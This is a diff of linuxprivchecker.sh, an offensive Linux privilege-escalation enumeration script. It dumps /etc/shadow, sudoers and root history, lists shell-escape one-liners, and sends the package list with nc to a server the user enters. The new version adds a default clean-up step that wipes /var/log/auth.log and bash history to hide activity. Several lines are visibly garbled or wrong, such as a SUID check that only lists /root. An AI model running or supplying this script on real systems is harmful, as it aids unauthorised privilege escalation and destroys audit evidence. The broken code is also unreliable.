2 2 3 3 ############################################################################################################### 4 4 ## [Title]: linuxprivchecker.sh -- a Linux Privilege Escalation Check Script 5 - ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 - ## [Contributors]: Mike Merrill (linted) -- https://github.com/linted 7 - ## James Hogan (5aru) -- https://github.com/5aru 5 + ## [Original Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 + ## Forked from linuxprivchecker.py -- https://github.com/sleventyeleven/linuxprivchecker 7 + ## [Contributors]: 8 + ## Mike Merrill (linted) -- https://github.com/linted 9 + ## James Hogan (5aru) -- https://github.com/5aru 10 + ## Ali Kaba (alibkaba) -- https://github.com/alibkaba 8 11 ##------------------------------------------------------------------------------------------------------------- 9 12 ## [Details]: 10 - ## Similar functions to Mike Czumak's linuxprivchecker.py Linux Privilege Escalation Check Script. 11 13 ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 12 14 ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 13 15 ## passwords and applicable exploits. 31 33 ## USE OR OTHER DEALINGS IN THE SOFTWARE. 32 34 ############################################################################################################### 33 35 34 - ### Useful functions 36 + # command paths 37 + PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" 35 38 36 - PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games" 39 + # fonts formatting 40 + RESET='\e[0m'; # No Color 41 + RED='\e[31m'; 42 + LRED='\e[91m'; 43 + GREEN='\e[32m'; 44 + LGREEN='\e[92m'; 45 + LYELLOW='\e[93m'; 46 + LCYAN='\e[96m'; 47 + BLINK='\e[5m'; 48 + BOLD='\e[1m'; 37 49 38 - TITLE_LINE=$(printf "%*s\n" "80" | tr ' ' "=") 39 - SECTION_LINE =$(printf "%*s\n" "80 " | tr ' ' "- ") 50 + # line formatting 51 + titleLINE =$(printf "$ { LGREEN } %*s\n" "70 " | tr ' ' "= "); 52 + sectionLINE=$(printf "${LGREEN}%*s\n" "40" | tr ' ' "-"); 40 53 41 - function formatCommand(){ 42 - eval $1 | sed 's|^| |' 54 + # title 55 + scriptTITLE(){ 56 + echo ${titleLINE}; 57 + echo "LINUX PRIVILEGE ESCALATION CHECKER" 58 + echo "Go to https://github.com/linted/linuxprivchecker for more info..." 59 + echo -e ${titleLINE}${RESET}; 43 60 } 44 61 45 - echo ${TITLE_LINE} 46 - echo "LINUX_PRIVILEGE ESCALATION CHECKER" 47 - echo ${TITLE_LINE} 62 + systemAREAtitle(){ 63 + echo ${sectionLINE}; 64 + echo "[*] $systemAREA..."; 65 + echo -e ${sectionLINE}${RESET}; 66 + printf "\n"; 67 + sleep .5s; 68 + } 48 69 49 - echo -e "\n[*] GETTING BASIC SYSTEM INFO...\n" 70 + cmdRESPONSE(){ 71 + # run and format cmd 72 + cmdRESULT=$(eval $1 2>/dev/null | sed 's|^| |'; echo "${PIPESTATUS[0]}"); 50 73 51 - echo "[+] Operating System" 52 - formatCommand "cat /etc/issue" 74 + # check cmd status 75 + if [ ${cmdRESULT:(-1)} -eq 0 ]; then 76 + echo -e "${LGREEN}[+] $systemNAME"; 77 + printf "${GREEN}${cmdRESULT%?}\n${RESET}"; 78 + else 79 + echo -e "${LRED}[!] $systemNAME"; 80 + printf "${LYELLOW}${cmdRESULT%?}\n${RESET}"; 81 + fi 82 + sleep .5s; 83 + } 53 84 54 - echo -e "\n[+] Kernel" 55 - formatCommand "cat /proc/version" 85 + operatingSYSTEM(){ 86 + systemAREA="OPERATING SYSTEM"; 87 + systemAREAtitle; 56 88 57 - echo -e "\n[+] Hostname/FQDN" 58 - formatCommand "hostname -f" 89 + systemNAME="Distribution"; 90 + cmdRESPONSE "cat /etc/*-release"; 59 91 60 - echo -ne "\n${SECTION_LINE}\n" 61 - echo -e "[*] GETTING NETWORKING INFO...\n" 92 + systemNAME="Kernel"; 93 + cmdRESPONSE "if [ -f /proc/version ]; then cat /proc/version; else uname -a; fi"; 62 94 63 - echo "[+] Route" 95 + systemNAME="Hostname"; 96 + cmdRESPONSE "hostname -f"; 64 97 65 - if [ -x "$(command -v route)" ]; then 66 - formatCommand "route -n" 67 - else 68 - formatCommand "ip route" 69 - fi 98 + systemNAME="Environment Variables"; 99 + cmdRESPONSE "env | grep -v "LS_COLORS""; 70 100 71 - echo -e "\n[+] Interfaces" 101 + systemNAME="Printer"; 102 + cmdRESPONSE "lpstat -a"; 103 + } 72 104 73 - if [ -x "$(command -v ifconfig)" ]; then 74 - formatCommand "ifconfig -a" 75 - else 76 - formatCommand "ip addr show" 77 - fi 105 + netWORK(){ 106 + systemAREA="NETWORK"; 107 + systemAREAtitle; 78 108 79 - echo -e "\n[+] Network Connections" 109 + systemNAME="Network Interfaces"; 110 + cmdRESPONSE "if [ -x "$(command -v ifconfig)" ]; then ifconfig; else ip a; fi"; 80 111 81 - if [ -x "$(command -v netstat)" ]; then 82 - formatCommand "netstat -tupan | grep -v TIME_WAIT" 83 - else 84 - formatCommand "ss -tupan | grep -v CLOSE_WAIT" 85 - fi 112 + systemNAME="DNS Resolver"; 86 113 87 - echo -ne "\n${SECTION_LINE}\n" 88 - echo -e "[*] GETTING FILESYSTEM INFO...\n" 114 + systemNAME="Route"; 115 + cmdRESPONSE "if [ -x "$(command -v route)" ]; then route -n; else ip route; fi"; 116 + } 89 117 90 - echo -e "\n[+] Mount Results" 91 - formatCommand "mount" 118 + userACCOUNTS(){ 119 + systemAREA="Users"; 120 + systemAREAtitle; 92 121 93 - echo -e "\n[+] fstab Entries" 94 - formatCommand "cat /etc/fstab 2>/dev/null" 122 + systemNAME="All Users"; 123 + cmdRESPONSE "cat /etc/passwd"; 95 124 96 - echo -e "\n[+] Scheduled cron jobs" 97 - formatCommand "ls -al /etc/cron* 2>/dev/null" 125 + systemNAME="My ID & Group(s)"; 126 + cmdRESPONSE "id"; 98 127 99 - echo -e "\n[+] Writable cron directories" 100 - formatCommand "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$' 2>/dev/null" 128 + systemNAME="Who's Logged Right Now"; 129 + cmdRESPONSE "w"; 101 130 102 - echo -ne "\n${SECTION_LINE}\n" 103 - echo -e "[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 104 - echo -e "\n[+] Current User" 105 - formatCommand "whoami" 131 + systemNAME="Who's Logged Last"; 132 + cmdRESPONSE "last"; 106 133 107 - echo -e "\n[+] Current User ID" 108 - formatCommand "id" 134 + systemNAME="Super Users"; 135 + cmdRESPONSE "grep -v -E '^#' /etc/passwd | awk -F: '(/$3 == 0) { print /$1 }'"; 109 136 110 - echo -e "\n[+] All users" 111 - formatCommand "cat /etc/passwd" 137 + systemNAME="Sudo Users"; 138 + cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; 112 139 113 - echo -e "\n[+] Super Users Found" 114 - formatCommand "grep -v -E '^#' /etc/passwd | awk -F: '\$3 == 0{print \$1}'" 140 + systemNAME="Sudoers (Privileged) [/etc/sudoers]"; 141 + cmdRESPONSE "cat /etc/sudoers | grep -v '#'"; 115 142 116 - echo -e "\n[+] Root and current user history (depends on privs)" 117 - formatCommand "ls -al ~/.*_history; ls -la /root/.*_history 2>/dev/null" 143 + systemNAME="Sudoers Files (Privileged) [/etc/sudoers.d/*]"; 144 + cmdRESPONSE "cat /etc/sudoers.d/* | grep -v '#'"; 118 145 119 - echo -e "\n[+] Environment Variables" 120 - formatCommand "env 2>/dev/null | grep -v 'LS_COLORS'" 146 + systemNAME="Shadow File"; 147 + cmdRESPONSE "cat /etc/shadow"; 121 148 122 - echo -e "\n[+] Sudoers (Privileged) [/etc/sudoers]" 123 - formatCommand "cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null" 149 + systemNAME="Root and Current User History (depends on privs)"; 150 + cmdRESPONSE "ls -al ~/.*_history 2>/dev/null; ls -la /root/.*_history"; 151 + } 124 152 125 - echo -e "\n[+] Sudoers Files (Privileged) [/etc/sudoers.d/*]" 126 - formatCommand "cat /etc/sudoers.d/* 2>/dev/null | grep -v '#' 2>/dev/null" 153 + fileSYSTEMS(){ 154 + systemAREA="FILE SYSTEMS"; 155 + systemAREAtitle; 127 156 128 - echo -e "\n[+] Logged in User Activity" 129 - formatCommand "w 2>/dev/null" 157 + systemNAME="Mounts"; 158 + cmdRESPONSE "mount"; 130 159 131 - echo -ne "\n${SECTION_LINE}\n" 132 - echo -e "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 160 + systemNAME="fstab Entries"; 161 + cmdRESPONSE "cat /etc/fstab"; 133 162 134 - echo -e "\n[+] World Writable Directories for User/Group 'root'" 135 - formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root" 163 + systemNAME="Scheduled Cron Jobs"; 164 + cmdRESPONSE "ls -al /etc/cron*"; 136 165 137 - echo -e "\n[+] World Writable Directories for User other than 'root'" 138 - formatCommand "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null" 166 + systemNAME="Writable Cron Directories"; 167 + cmdRESPONSE "ls -aRl /etc/cron* | awk '/$1 ~ /w.$'"; 139 168 140 - echo -e "\n[+] World Writable Files" 141 - formatCommand "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';' 2>/dev/null" 169 + systemNAME="Root Home Folder Accessibility"; 170 + cmdRESPONSE "ls -lt /root/"; 142 171 143 - echo -e "\n[+] SUID/GUID Files and Directories" 144 - formatCommand "find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null" 172 + systemNAME="World Writeables Directories for User/Group 'root'"; 173 + cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -o+w \) -exec ls -ld '{}' ';' | grep root"; 174 + 175 + systemNAME="World Writeables Directories for non-root Users"; 176 + cmdRESPONSE "find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' | grep -v root "; 145 177 146 - echo -e "\n[+] Checking if root's home folder is accessible" 147 - formatCommand "ls -ahlR /root 2>/dev/null" 178 + systemNAME="World Writeables Files"; 179 + cmdRESPONSE "find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0 002 \) -exec ls -l '{}' ';'"; 148 180 149 - echo -e "\n[+] Logs containing keyword 'password'" 150 - formatCommand "find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null" 181 + systemNAME="SUID/GUID Files and Directories"; 182 + cmdRESPONSE "ls -ahlR /root"; 151 183 152 - echo -e "\n[+] Config files containing keyword 'password'" 153 - formatCommand "find /etc -name '*.c * ' 2 > / dev / null | xargs -l10 egrep 'pwd|password' 2>/dev/null" 184 + systemNAME="Configuration Files Containing Keyword 'password'"; 185 + cmdRESPONSE "find /var / log -name '*.log ' | xargs -l10 egrep 'pwd|password' 2>/dev/null"; 154 186 155 - echo -e "\n[+] Shadow Files (Privileged)" 156 - formatCommand "cat /etc/shadow 2>/dev/null" 187 + } 157 188 158 - echo -ne "\n${SECTION_LINE}\n" 159 - echo -e "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 189 + applicationSERVICES(){ 190 + systemAREA="APPLICATIONS & SERVICES"; 191 + systemAREAtitle; 160 192 161 - echo - e "[ + ] Installed Packages"162 - if [ -x "$(command -v dpkg)" ]; then 163 - PKGMNGR=1 164 - formatCommand "dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'" 165 - elif [ -x "$(command -v dnf)" ]; then 166 - PKGMNGR=2 167 - formatCommand "dnf -qa | sort -u" 168 - elif [ -x "$(command -v rpm)" ]; then 169 - PKGMNGR=3 170 - formatCommand "rpm -qa | sort -u" 171 - fi 193 + systemNAME = "Installed Packages"; 194 + cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | awk '{\$1=\$4=\"\"; print \$0}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | sort -u; elif [ -x "$(command -v rpm)" ]; then rpm -qa | sort -u; fi"; 172 195 173 - echo -e "\n[+] Current Processes" 174 - formatCommand "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'" 196 + systemNAME="Current Running Services"; 197 + cmdRESPONSE "ps aux | awk '{print \$1,\$2,\$9,\$10,\$11}'"; 175 198 176 - echo -e "\n[+] Sudo Version" 177 - formatCommand "sudo -V | grep version 2 > / dev / null " 199 + systemNAME="Sudo version"; 200 + cmdRESPONSE "sudo -V | grep version"; 178 201 179 - echo - e "\ n [ + ] Apache Version and Modules"180 - formatCommand "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l 2 > / dev / null " 202 + systemNAME = "Apache Version and Modules"; 203 + cmdRESPONSE "apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; apachectl -l"; 181 204 182 - echo - e "\ n [ + ] Apache Config File"183 - formatCommand "cat /etc/apache2/apache2.conf 2 > / dev / null " 205 + systemNAME = "Apache Config File"; 206 + cmdRESPONSE "cat /etc/apache2/apache2.conf"; 184 207 185 - echo -ne "\n${SECTION_LINE}\n" 186 - echo -e "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 208 + systemNAME="Processes and Packages Running as Root or other Superuser"; 209 + EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))"; 210 + cmdRESPONSE "if [ -x "$(command -v dpkg)" ]; then dpkg -l | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v dnf)" ]; then dnf -qa | grep -iE '${EXTDGREP}'; elif [ -x "$(command -v rpm)" ]; then rpm -qa | grep -iE '${EXTDGREP}'; fi"; 187 211 188 - EXTDGREP="($(ps -u 0 | tail -n+2 | rev | cut -d " " -f 1 | rev | cut -d "/" -f1 | sort | uniq | xargs | tr " " "|"))" 212 + systemNAME="Installed Tools"; 213 + cmdRESPONSE "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp"; 189 214 190 - if [ $PKGMNGR -eq 1 ]; then 191 - formatCommand "dpkg -l | grep -iE '${EXTDGREP}'" 192 - elif [ $PKGMNGR -eq 2 ]; then 193 - formatCommand "dnf -qa | grep -iE '${EXTDGREP}'" 194 - elif [ $PKGMNGR -eq 3 ]; then 195 - formatCommand "rpm -qa | grep -iE '${EXTDGREP}'" 196 - fi 215 + systemNAME="Related Shell Escape Sequences"; 216 + cmdRESPONSE "if [ -x "$(command -v vi)" ]; then echo -ne \"vi-->\t:!bash\n\"; echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"; fi"; 217 + cmdRESPONSE "if [ -x "$(command -v vim)" ]; then echo -ne \"vim-->\t:!bash\n\" | sed 's|^| |'; echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |'; fi"; 218 + cmdRESPONSE "if [ -x "$(command -v awk)" ]; then echo -ne \"awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n\" | sed 's|^| |'; fi"; 219 + cmdRESPONSE "if [ -x "$(command -v perl)" ]; then echo -ne \"perl-->\tperl -e 'exec \"/bin/bash\";'\n\" | sed 's|^| |'; fi"; 220 + cmdRESPONSE "if [ -x "$(command -v python)" ]; then echo -ne \"python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n\" | sed 's|^| |'; fi"; 221 + cmdRESPONSE "if [ -x "$(command -v find)" ]; then echo -ne \"find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n\" | sed 's|^| |'; fi"; 222 + cmdRESPONSE "if [ -x "$(command -v nmap)" ]; then echo -ne \"nmap-->\t--interactive\n\" | sed 's|^| |'; fi"; 223 + } 197 224 198 - echo -ne "\n${SECTION_LINE}\n" 199 - echo -e "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING..." 225 + searchEXPLOITS(){ 226 + systemAREA="Search for Exploits"; 227 + systemAREAtitle; 200 228 201 - echo -e "\n[+] Installed Tools" 202 - formatCommand "which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null" 229 + echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." 230 + read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer 203 231 204 - echo -e "\n[+] Related Shell Escape Sequences" 205 - if [ -x "$(command -v vi)" ]; then 206 - formatCommand "echo -ne \"vi-->\t:!bash\n\"" 207 - formatCommand "echo -ne \"vi-->\t:set shell=/bin/bash:shell\n\"" 208 - fi 232 + if [[ $connectToServer = y* ]] 233 + then 234 + read -p "[?] What is the address of the server? " server 235 + read -p "[?] What port is the server using? " port 236 + echo -ne "\n\n" 237 + echo -e "[ ] Searching on $server:$port" 238 + printf "%*s\n" "80" | tr " " "*" 239 + dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port 240 + printf "%*s\n" "80" | tr " " "*" 241 + fi 242 + } 209 243 210 - if [ -x "$(command -v vim)" ]; then 211 - echo -ne "vim-->\t:!bash\n" | sed 's|^| |' 212 - echo -ne "vim-->\t:set shell=/bin/bash:shell\n" | sed 's|^| |' 213 - fi 244 + cleanUP(){ 245 + systemAREA="Clean Up"; 246 + systemAREAtitle; 214 247 215 - if [ -x "$(command -v awk)" ]; then 216 - echo -ne "awk-->\tawk 'BEGIN {system(\"/bin/bash\")}'\n" | sed 's|^| |' 217 - fi 248 + systemNAME="Clearing /var/log/auth.log"; 249 + cmdRESPONSE "echo " " > /var/log/auth.log"; 218 250 219 - if [ -x "$(command -v perl)" ]; then 220 - echo -ne "perl-->\tperl -e 'exec \"/bin/bash\";'\n" | sed 's|^| |' 221 - fi 251 + systemNAME="Clearning bash_history"; 252 + cmdRESPONSE "echo " " > ~/.bash_history"; 222 253 223 - if [ -x "$(command -v python)" ]; then 224 - echo -ne "python-->\tpython -c '__import__(\"os\").system(\"/bin/bash\")'\n" | sed 's|^| |' 225 - fi 254 + systemNAME="Clearing Current Session History"; 255 + cmdRESPONSE "history -c"; 226 256 227 - if [ -x "$(command -v find)" ]; then 228 - echo -ne "find->\tfind / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;\n" | sed 's|^| |' 229 - fi 257 + systemNAME="Setting history max lines to 0"; 258 + cmdRESPONSE "export HISTFILESIZE=0"; 230 259 231 - if [ -x "$(command -v nmap)" ]; then 232 - echo -ne "nmap-->\t--interactive\n" | sed 's|^| |' 233 - fi 260 + systemNAME="Setting history max cmds to 0"; 261 + cmdRESPONSE "export HISTSIZE=0"; 234 262 235 - echo -ne "\n${SECTION_LINE}\n" 236 - echo -e "[*] FINDING RELEVANT PRIVILEGE ESCALATION EXPLOITS..." 237 - read -p "[?] Would you like to search for possible exploits? [y/N] " connectToServer 263 + echo ${titleLINE}; 264 + echo "FINISHED" 265 + echo -e ${titleLINE}${RESET}; 266 + } 238 267 239 - if [[ $connectToServer = y* ]] 240 - then 241 - read -p "[?] What is the address of the server? " server 242 - read -p "[?] What port is the server using? " port 243 - echo -ne "\n\n" 244 - echo -e "[ ] Searching on $server:$port" 245 - printf "%*s\n" "80" | tr " " "*" 246 - dpkg -l | tail -n +6 | awk '{print $2, $3} END {print ""}' | nc $server $port 247 - printf "%*s\n" "80" | tr " " "*" 248 - fi 268 + start(){ 269 + scriptTITLE; 270 + operatingSYSTEM; 271 + netWORK; 272 + userACCOUNTS; 273 + fileSYSTEMS; 274 + applicationSERVICES; 275 + searchEXPLOITS; 276 + cleanUP; 277 + echo -e $RESET; 278 + } 249 279 250 - echo -ne "\n\n${TITLE_LINE}" 251 - echo -ne "\nFINISHED" 252 - echo -ne "\n${TITLE_LINE}\n" 280 + start; 253 281
